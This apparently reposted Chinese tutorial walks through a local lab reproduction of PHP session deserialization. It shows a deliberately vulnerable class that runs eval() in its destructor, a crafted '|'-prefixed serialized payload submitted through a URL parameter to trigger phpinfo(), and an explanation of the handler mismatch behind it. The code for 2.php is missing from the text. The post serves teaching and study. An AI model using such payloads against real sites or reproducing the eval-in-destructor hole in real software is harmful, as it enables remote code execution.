PHP SESSION反序列化本地樣例分析

0X00漏洞原因

主要原因是： ini_set(‘session.serialize_handler’, ‘php_serialize’);

ini_set(‘session.serialize_handler’, ‘php’);

兩者處理session的方式不同。

0X01漏洞分析

如果在PHP在反序列化存儲(chǔ)的$_SESSION數(shù)據(jù)時(shí)使用的引擎和序列化使用的引擎不一樣，會(huì)導(dǎo)致數(shù)據(jù)無法正確第反序列化。通過精心構(gòu)造的數(shù)據(jù)包，就可以繞過程序的驗(yàn)證或者是執(zhí)行一些系統(tǒng)的方法

0X02漏洞環(huán)境

Windows10

Phpstudy一件集成環(huán)境

0X03漏洞復(fù)現(xiàn)

首先現(xiàn)在本地phpstudy網(wǎng)站根目錄新建倆個(gè)測試用例1.php和2.php

內(nèi)容分別為

1.php：

ini_set('session.serialize_handler', 'php');

session_start();classtest {var$hi;

function __construct(){

$this->hi = 'phpinfo();';

}

function __destruct() {

eval($this->hi);

}

}?>

2.php：

漏洞利用

首先構(gòu)造反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

可以看到2.php中接收的參數(shù)為a

提交2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}，

也就是訪問127.0.0.1\2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}，

訪問后結(jié)果如下：

然后再訪問http://127.0.0.1/test1.php,成功執(zhí)行phpinfo()

0X04漏洞分析

提交2.php?a=|O:4:“test”:1:{s:2:“hi”;s:10:“phpinfo();”;}，

傳入的數(shù)據(jù)會(huì)按照php_serialize來進(jìn)行序列化：a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

此時(shí)訪問1.php，應(yīng)用程序會(huì)按照php來反序列化SESSION中的數(shù)據(jù)，此時(shí)就會(huì)反序列化偽造的數(shù)據(jù)，php引擎會(huì)以|作為作為key和value的分隔符，那么就會(huì)將a:1:{s:4:"test";s:43:"作為SESSION的key，將O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作為value，然后進(jìn)行反序列化，最后就會(huì)就會(huì)實(shí)例化test對(duì)象，最后就會(huì)執(zhí)行析構(gòu)函數(shù)中的eval()方法。

創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來咯，堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)

總結(jié)

以上是生活随笔為你收集整理的php session 反序列化,PHP SESSION反序列化本地样例分析的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。